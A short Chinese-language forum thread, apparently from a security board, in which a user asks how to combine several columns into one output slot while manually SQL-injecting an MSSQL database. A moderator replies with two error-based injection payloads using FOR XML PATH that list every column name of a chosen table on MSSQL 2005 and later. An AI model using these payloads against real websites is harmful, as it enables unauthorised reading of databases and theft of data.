关于手工注入MSSQL,联合查询的问题?
MSSQL2000 数据库,在手工注入时,用联合查询,如何将多个字段组合成一列返回到1个显示位上面? 坐等大神回复,正好我也学习下 and 1=(select quotename(name) from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--and 1=(select '|'%2bname%2b'|' from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))--
一次爆指定表的所有列(只限于mssql2005及以上版本): 坐等大神回复,正好我也学习下 wuyan 发表于 2015-11-28 13:40
and 1=(select quotename(name) from 数据库名..syscolumns where id =(select id from 数据库名..sysobjec ...
哈哈,非常感谢版主的指导,但是这个只用于2005,不知道2000有没有什么方法? lyfzxz 发表于 2015-11-30 18:20
哈哈,非常感谢版主的指导,但是这个只用于2005,不知道2000有没有什么方法? ...
2000的暂时不太清楚
页:
[1]